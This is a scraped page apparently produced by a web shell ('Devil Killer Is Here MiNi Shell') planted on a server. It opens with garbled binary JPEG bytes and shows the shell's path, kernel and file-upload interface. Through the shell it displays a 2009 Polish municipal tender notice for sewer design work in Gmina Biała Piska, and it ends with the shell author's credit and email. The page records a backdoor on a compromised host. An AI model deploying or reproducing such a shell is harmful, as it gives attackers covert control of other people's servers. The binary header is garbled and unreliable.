JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090213/27498-N-2009.html

<p class="kh_header"><b>Biała Piska: Opracowanie dokumentacji projektowo-kosztorysowej dla inwestycji:
Rozbudowa i modernizacja infrastruktury wodno-ściekowej w Regionie Wielkich Jezior Mazurskich - MASTERPLAN dla Wielkich Jezior Mazurskich
 Gmina Biała Piska
Zadanie 1 Budowa kanalizacji sanitarnej Komorowo
Zadanie 2 Budowa kanalizacji sanitarnej Nowe Drygały
Zadanie 3 Budowa kanalizacji sanitarnej Sulimy</b><br>
<b>Numer ogłoszenia: 27498 - 2009; data zamieszczenia: 13.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biała Piska , Plac Adama Mickiewicza 25, 12-230 Biała Piska, woj. warmińsko-mazurskie, tel. 0-87 4241350, 4241363, faks 0-87 4241351.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.bialapiska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej dla inwestycji:
Rozbudowa i modernizacja infrastruktury wodno-ściekowej w Regionie Wielkich Jezior Mazurskich - MASTERPLAN dla Wielkich Jezior Mazurskich
 Gmina Biała Piska
Zadanie 1 Budowa kanalizacji sanitarnej Komorowo
Zadanie 2 Budowa kanalizacji sanitarnej Nowe Drygały
Zadanie 3 Budowa kanalizacji sanitarnej Sulimy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej dla inwestycji: Rozbudowa i modernizacja infrastruktury wodno-ściekowej w Regionie Wielkich Jezior Mazurskich- MASTERPLAN dla Wielkich Jezior Mazurskich - Gmina Biała Piska
Zadanie 1 Budowa kanalizacji sanitarnej Komorowo
Zadanie 2 Budowa kanalizacji sanitarnej Nowe Drygały
Zadanie 3 Budowa kanalizacji sanitarnej Sulimy

Przedmiotowa dokumentacja służyć będzie do przeprowadzenia przetargów na wykonanie robót budowlanych. W związku z powyższym przedmiot zamówienia winien być opisany za pomocą cech technicznych i jakościowych, z zachowaniem Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy. Opisując przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, Wykonawca jest obowiązany wskazać, że dopuszcza rozwiązania równoważne opisywanym.

Zakres prac projektowych obejmuje:
Zadanie 1 Budowa kanalizacji sanitarnej Komorowo
- kanalizację grawitacyjną w miejscowości Komorowo ok. 540 m, wraz z przepompownią oraz przykanalikami do około 16 budynków,
- rurociąg tłoczny o dł. ok. 1750 m z miejscowości Komorowo do miejscowości Bełcząc wraz z włączeniem do kanalizacji Bełcząc - Biała Piska (oczyszczalnia ścieków).
Zadanie 2 Budowa kanalizacji sanitarnej Nowe Drygały
- kanalizację grawitacyjną w miejscowości Nowe Drygały ok. 900 m, wraz z przepompowniami oraz przykanalikami do około 40 budynków,
- rurociąg tłoczny o dł. ok. 1750 m w miejscowości Nowe Drygały wraz z włączeniem go w miejscowości Nowe Drygały  do kolektora tłocznego Drygały-Biała Piska (oczyszczalnia ścieków).

Zadanie 3 Budowa kanalizacji sanitarnej Sulimy
- kanalizację grawitacyjną w miejscowości Sulimy ok. 840 m, wraz z przepompownią oraz przykanalikami do około 30 budynków,
- rurociąg tłoczny o dł. ok. 200 m w miejscowości Sulimy wraz z włączeniem go do przepompowni zlokalizowanej w miejscowości Sulimy,
- modernizacja istniejącej przepompowni w miejscowości Sulimy podłączonej do kolektora tłocznego Drygały - Biała Piska(oczyszczalnia ścieków).

Szczegółowy zakres opracowania projektowo - kosztorysowego obejmuje:
1. Wykonanie projektów budowlanych budowy kanalizacji sanitarnej zgodnie  z Rozporządzeniem Ministra Infrastruktury z 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. Nr 120, poz. 1133), przepisami ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz.U. z 2007 r. Nr 223, poz.1655 z późn. zm.), ustawy z dnia 29 stycznia 2004 r. Prawo ochrony środowiska (tj. Dz. U. z 2008 r. Nr 25 poz. 150) oraz innymi przepisami szczególnymi obowiązującymi w zakresie zamówienia - w 5 egzemplarzach + wersja elektroniczna. 
2. Wykonanie projektów wykonawczych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.) w 5 egzemplarzach + wersja elektroniczna.
3. Projekty czasowej organizacji ruchu w 5 egzemplarzach + wersja elektroniczna. 
4. Wykonanie kosztorysów inwestorskich, ofertowych oraz przedmiarów robót zgodnie z obowiązującymi w tym zakresie przepisami tj. Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno użytkowym (Dz. U. Nr 130, poz. 1389), w 5 egzemplarzach + wersja elektroniczna.
5. Sporządzenie specyfikacji technicznej wykonania i odbioru robót zgodnie z zakresem określonym Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.), w 5 egzemplarzach + wersja elektroniczna.
6. Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa.
7.Przygotowanie dokumentów niezbędnych do uzyskania prawomocnej decyzji o ustaleniu lokalizacji inwestycji celu publicznego, zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz.717 z późn. zm.).
8. Sporządzenie dokumentacji wymaganej przepisami ustawy z dnia 3 październik 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227) do przeprowadzenia postępowania o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia inwestycyjnego polegającego na budowie sieci kanalizacji sanitarnej. 
9. Wykonanie Raportów oddziaływania inwestycji na środowisko, w 4 egzemplarzach + wersja elektroniczna.
10. Wykonanie wymaganych operatów wodno - prawnych. Uczestniczenie w postępowaniach wodno - prawnych o wydanie decyzji pozwolenia wodno - prawnego.
11. Wykonanie niezbędnych badań geotechnicznych gruntów dla potrzeb posadowienia przedmiotowych budowli.
12. Pozyskanie map sytuacyjno - wysokościowych właściwych do celów projektowych obejmujących tereny nieruchomości, na których zostanie zlokalizowana sieć sanitarna jak również tereny przyległe w zakresie niezbędnym dla zaprojektowania przyłączy kanalizacyjnych. Mapy należy wykonać w wersji cyfrowej.
13. Uzyskanie zgody w formie oświadczenia od właścicieli gruntów, przez które przebiegać będzie projektowana sieć sanitarna i przykanaliki.
14. Uzyskanie wypisów z ewidencji gruntów ze Starostwa Powiatowego w Piszu dotyczących działek, których przedmiotowe zadanie inwestycyjne dotyczy.
15. Uzyskanie niezbędnych opinii, uzgodnień, pozwoleń i sprawdzeń rozwiązań projektowych do uzyskania pozwolenia na budowę ( kolej, ZUD, Zakład Energetyczny, Telekomunikacja, Zarządców Dróg, Zarządu Melioracji Urządzeń Wodnych, Straży Pożarnej, Ochrony środowiska, Sanepidu - oraz innych niezbędnych z uwagi na zakres zamówienia).  
16. Sporządzenie dokumentacji formalno - prawnej do uzyskania decyzji pozwolenia na budowę. Wykonawca powinien w imieniu i na rzecz Zamawiającego uzyskać decyzje o pozwoleniu na budowę wydane przez właściwy terenowo organ administracji.
17. Zakres i forma opracowania dokumentu w formie elektronicznej:
17.1. pliki źródłowe kosztorysów winny zostać przekazane Zamawiającemu w formie elektronicznej w rozszerzeniu ATH,
17.2. pliki zawierające Specyfikacje techniczna wykonania i odbioru robót jak również pliki obejmujące części opisowe dokumentacji technicznej winny mieć możliwość edycji w programie MICROSOFT WORD 2002,
17.3. pliki zawierające rysunki wykonawcze i pomocnicze winny być zapisane w formacie PDF,
17.4. Zamawiający jednocześnie zastrzega sobie aby dodatkowo Wykonawca wykonał w/w opracowania w formacie plików PDF w następujący sposób;
- 1 plik - przedmiar robót oraz szczegółowy kosztorys ślepy,
- 1 plik - specyfikacja techniczna wykonania i odbioru robót,
- 1 plik - część opisowa dokumentacji technicznej,
- 1 plik - rysunki konstrukcyjne i pomocnicze..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1. Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
2. Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia:
- posiadają niezbędną wiedzę, doświadczenie - zaprojektowali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim zakresem rzeczowym usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu (zakresu), inwestora, dat wykonania oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. Wymagane minimum: projekty co najmniej dwóch sieci kanalizacji sanitarnej o długości nie mniejszej niż 6 km każda, 
- dysponują osobami zdolnymi do wykonania zamówienia - dysponują co najmniej   1 osobą posiadającą stosowne uprawnienia odpowiednie do charakteru i zakresu prac określonych niniejszym zamówieniem, która posiada aktualny wpis na listę członków właściwej izby samorządu zawodowego. 
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający wymaga, aby Wykonawca wykazał, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
Spełnienie warunków musi być potwierdzone odpowiednimi dokumentami i oświadczeniami dołączonymi do oferty (zgodnie z rozdziałem IX SIWZ).
Ocena spełnionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, których oferta odpowiada zasadom określonym w ustawie Prawo zamówień publicznych i spełniają wymagania określone Specyfikacji Istotnych Warunków Zamówienia.
1. Formularz ofertowy - wypełniony i podpisany przez  Wykonawcę (Załącznik nr 1 do SIWZ). (W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia, dokument należy złożyć wspólnie).
2. Formularze cenowe (Załącznik nr 2a, 2b, 2c do SIWZ) wypełniony i podpisany przez  Wykonawcę. (W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia, dokument należy złożyć wspólnie).
3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich). 
4. Oświadczenie o spełnieniu warunków zawartych w art. 22 ust.1 oraz art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Załącznik nr 3 do SIWZ). (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich). 
5. Wykaz wykonanych usług w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim zakresem rzeczowym usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu (zakresu), inwestora, dat wykonania oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. Wymagane minimum: projekty co najmniej dwóch sieci kanalizacji sanitarnej o długości nie mniejszej niż 6 km każda (Załącznik nr 4 do SIWZ). (W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny oraz doświadczenie). 
6. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (Załącznik nr 5 do SIWZ). (W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, dokument składa ten z Wykonawców, który spełnia warunek udziału w postępowaniu lub ci którzy Wykonawcy, którzy łącznie spełnią warunek udziału w postępowaniu).
7. Dokumenty stwierdzające, że osoby o których mowa w pkt. 6, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz aktualny dokument stwierdzający przynależność do właściwej izby samorządu zawodowego.
8. Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. (W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia, dokument ma obowiązek złożyć ten lub ci z Wykonawców, którzy wykazywać będą spełnienie danego warunku).
9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia.
10. Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87 poz. 605). Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
11. Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - wymagane jeśli Wykonawca wykona przedmiot zamówienia przy pomocy innych podmiotów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.bialapiska.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 12-230 Biała Piska, ul.Plac Adama Mickiewicza 25, pokój nr 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 10:00, miejsce: Urząd Miejski 12-230 Biała Piska, ul.Plac Adama Mickiewicza 25, pokój nr 12..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com